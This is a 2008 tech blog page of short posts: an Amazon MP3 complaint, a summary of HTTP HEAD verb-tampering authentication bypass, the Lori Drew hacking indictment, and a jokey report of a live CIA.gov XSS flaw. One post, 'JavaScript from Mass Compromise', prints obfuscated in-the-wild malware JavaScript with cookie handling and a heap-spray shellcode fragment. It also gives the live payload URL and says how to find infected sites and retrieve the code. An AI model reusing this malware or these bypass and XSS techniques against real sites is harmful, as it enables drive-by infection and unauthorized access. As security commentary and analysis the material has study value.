| |
| Current Topic: Technology |
|
|
|---|
| Topic: Technology |
10:46 am EDT, Jun 27, 2008 |
I've been loving Amazon MP3 for a couple months now. Its just so damn easy. I can find who I want, move it back and forth between Linux at home, my work laptop, and my iPod with ease. The only thing that is annoying me is Amazon's MP3 Downloader. When you buy a song without the download you just get an MP3. When you use buy a song with the MP3 Downloader it files the MP3 away nicely into a directory structure in "My Music" and automatically adds it to iTunes. Amazon is doing some kind of detection in the browser and servers you an AMX file for the downloader instead of a raw MP3. Only it seems that my browsers "forget" about the Downloader after every reboot. Amazon goes back to gives me MP3s. I'm not sure whether the browsers just no longer detect the program or whether the file association is lsot or what. Its gotten so bad I just keep the install file on my desktop and do an uninstall/reinstall everytime I need to shop. Grrrr. I don't know anyone at Amazon, but if you are reading this, I love your service and please fix this issue. |
|
Bypassing Web Authentication and Authorization with HTTP Verb Tampering |
|
|
|---|
| Topic: Technology |
12:46 pm EDT, May 28, 2008 |
This is a cool paper and all of you should read it for many reasons. First, because it’s a perfect example of hacking. Hacking is just critical thinking and understanding how a system works. In this paper by understanding the nuances of web technologies the researchers found a very trivial way to bypass the authentication systems of many popular web frameworks! Second, it’s a classic example how programmers with even a little security knowledge can make big mistakes. Here is the paper in a nutshell: Various web frameworks like Jave EE, ASP.NET, etc, allow you to configure the website so certain directories are only accessible to certain users with certain HTTP methods. So anyone can do a GET or POST to /public/ but only an admin can do a GET or POST to /admin/. Enter the HTTP HEAD method. This is usually used to diagnostics and caching. If you send an HTTP HEAD instead of an HTTP GET to a URL, the website is supposed to do everything it would normally do when processing a GET, only it should only the HTTP response contains only header and no body. To make sure the same response (sans body) is sent for an HEAD as a GET, web servers simply handle the response as if it was a GET, and suppress the body when sending the response. Do you see the trick yet? HTTP HEAD method can be used to side-step authentication systems in many web applications. An attacker simply sends a HEAD to /admin/deleteUser?user=billy? instead of an GET. The authentication framework checks and sees that anyone can send HEADs to /admin/ and does not stop the processing of the request. The web server runs all the back end code that it normally runs for a GET, which deletes Billy as a user. The attacker does not see the body on the response, so it’s a blind attack. However the attacker can see the HTTP status code that is returned with the response to the HEAD and based on its value (200, vs 500) the attacker can tell if it worked. This is exactly the reason why HTTP GET should be idempotent. In other works, GETs and HEADs should not modify the state of the web server so you can send multiple gets to the exact same URL and it should not cause problems. POSTs on the other hand are not idempotent. This is why e-commerce sites say things like “don’t click checkout again!” and your browser will say things like “You have already submitted POST data, are you sure you want to refresh and send this again?” (AMP, we aren’t doing this in our web frontend right?) We even have an idea about how widespread this problem could be. In 2005 Google launched Google Web Accelerator. This was a browser plug in that pre-fetched links on the page you were looking to better utilize your bandwidth. Unfortunately, thousands of sites started breaking because developers all of the world were using simple hyperlinks (which issue a GET) to modify the state of the web app. There was lots of kicking and screaming, and I acquired a healthy dislike for Ruby on Rails developers who kept insisted that the rest of the world was wrong and they were right, but I digress. In short, by knowing HTTP and understanding that a developer implemented a default “Allow All” feature, this very cool attack was discovered. Bypassing Web Authentication and Authorization with HTTP Verb Tampering |
|
MySpace Suicide Indictment: or TOS violation = crime |
|
|
|---|
| Topic: Technology |
11:09 am EDT, May 27, 2008 |
On Thursday, the U.S. Attorney for the Central District of California announced that Lori Drew, now 49 years old, was indicted on conspiracy and hacking charges. The indictment charges Drew, a resident of O'Fallon, Missouri, with three counts of unauthorized access by violation of MySpace's terms of service and one count of conspiracy.
... ? Where hacking = Computer Fraud and Abuse Act. So, the DA's logic is that that by violating MySpace's TOS, Drew was no longer an authorized user of MySpace's systems and thus by continuing to use MySpace she committed unauthorized access. There is a good write up over at The Volokh Conspiracy by Orin Kerr and I highly suggest you read it. A few choice quotes from Security Focus's coverage: Yet, legal experts argue that charging a person for violating computer-crime statutes because they broke the terms-of-service agreement of an online site could lead to the ability to charge nearly anyone with computer crime. Using residential broadband for business purposes? A violation of the terms of service and, thus, potentially a crime. Checking sports sites while at work? A violation of corporate policy and, thus, potentially a crime.
and "There is nothing in the indictment that differentiates between what is a serious violation of the terms of service and a trivial violation of the terms of service," Morris told SecurityFocus. "I would bet that the majority of U.S. Internet users have committed a federal crime, if the charges in this indictment are upheld."
and my personal favorite "Violating a website's 'TOS' is carte blanche to an imaginative prosecutor," Greenfield said. "We are all felons if this flies."
MySpace Suicide Indictment: or TOS violation = crime |
|
|
|---|
| Topic: Technology |
8:07 am EDT, May 15, 2008 |
They are a kinetic energy device like the railgun, but instead of using electricity to achieve destructive velocities, they use gravity. The still-hypothetical system would be comprised of two satellites in orbit around the Earth. One would house the communications and targeting hardware, while the other would house the rods themselves, each up to a foot in diameter and twenty feet long. To fire, they would simply be released and allowed to fall back to Earth (with a bit of remote guidance). By the time they reached the surface, they'd be traveling at a speed of 36,000 feet per second and carry the destructive force of a nuclear warhead, only with none of the radioactive fallout.
!!! ... !!! Dropping telephone poles on people. From Space! Damn. Rods From God |
|
CIA.gov XSS still working |
|
|
|---|
| Topic: Technology |
5:45 pm EDT, Apr 18, 2008 |
In an age where JavaScript is so ubiquitous that some websites won't even load if you don't enable in your browser, cross-site scripting hacks are everywhere - letting malicious or merely mischievous hacker create links that have some very unintended consequences on websites that are not careful to keep from executing other people's code. Most are run-of-the-mill and hardly worth writing about, but reader Harry Sintonen writes in with a vulnerability on the CIA's site that THREAT LEVEL can't resist. For those of you who don't see it after clicking through, notice that the links lead to the CIA's site, but displays a recent THREAT LEVEL story. Here the CIA search box fails to rip out characters that will run as a script when the site tries to process the search query.
This story went up at 3:26pm, and it's still working at 8:45pm. This would be great for a prank form... Update: This is still working today. So much for fast response.. Here is the obligatory memestreams @ cia.gov link. SSL no less. CIA.gov XSS still working |
|
Everything i needed to know about managing hackers, i learnt from my DVD collection |
|
|
|---|
| Topic: Technology |
8:22 am EDT, Mar 24, 2008 |
Many execs will tell you the same thing about their role in the eco-system.. but what they miss is that they do not need for this to be a zero sum game. i.e. Achilles does not want to be king, and he certainly doesnt want to concern himself with collecting taxes. He will gladly serve as a soldier to a king who proves himself worthy. This ties in pretty closely to Paul Grahams thoughts on your super hackers and remuneration: "Economically, this is a fact of the greatest importance, because it means you don't have to pay great hackers anything like what they're worth. A great programmer might be ten or a hundred times as productive as an ordinary one, but he'll consider himself lucky to get paid three times as much."
Everything i needed to know about managing hackers, i learnt from my DVD collection |
|
The New School of Information Security |
|
|
|---|
| Topic: Technology |
8:03 am EDT, Mar 17, 2008 |
 Why is information security so dysfunctional? Are you wasting the money you spend on security? This book shows how to spend it more effectively. How can you make more effective security decisions? This book explains why professionals have taken to studying economics, not cryptography--and why you should, too. And why security breach notices are the best thing to ever happen to information security. It’s about time someone asked the biggest, toughest questions about information security. Security experts Adam Shostack and Andrew Stewart don’t just answer those questions--they offer honest, deeply troubling answers. They explain why these critical problems exist and how to solve them. Drawing on powerful lessons from economics and other disciplines, Shostack and Stewart offer a new way forward. In clear and engaging prose, they shed new light on the critical challenges that are faced by the security field. Whether you’re a CIO, IT manager, or security specialist, this book will open your eyes to new ways of thinking about--and overcoming--your most pressing security challenges. The New School enables you to take control, while others struggle with non-stop crises.null
Go Adam! Congrats on getting this out the door! We can exchange signed copies at RSA. The New School of Information Security |
|
JavaScript from Mass Compromise |
|
|
|---|
| Topic: Technology |
2:19 pm EDT, Mar 13, 2008 |
McAfee is talking about a massive website compromise thats using JavaScript to drop malware. The attacker(s) is injecting tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code. However, based on the vector the attackers are using (inejcting into <title> tag) the simple Google query intitle: <script src=http will show you the sites that are infected and where you can fetch code. Some of the websites serving the Malware require you to spoof a Referer header to receive the actual malware. Here is one example with a little pass through a JavaScript analyzer. http://b.njnk.net:80/E/J.JS
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y") [ 0] .innerHTML += z1IlcFFl0X + "<b" + "r>";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == - 1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2;
}
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == - 1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
z1IlakFl0X += z1IlakFl0X;
}
z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
return z1IlakFl0X;
};
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0 x0c0c0c0c;
var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ]JavaScript from Mass Compromise |
|
|
|---|
| Topic: Technology |
4:55 pm EST, Mar 3, 2008 |
DOMTree.cs Line 84:
/// <summary>
/// recursive helper
/// </summary>
/// <param name="curr">curr DOM tree node</param>
/// <param name="token">Reflection Token</param>
/// <param name="locs">list of current reflections</param>
private void FindTokens(XmlNode curr, string token, ref List<ReflectedLocation> locs, string origParamVal) {
...
if(i <= 0 )
{
//HANDLE CRAP HERE, which I should do, but I don't.
//This is bad. Billy is a slacker.
}
...
}
|
|
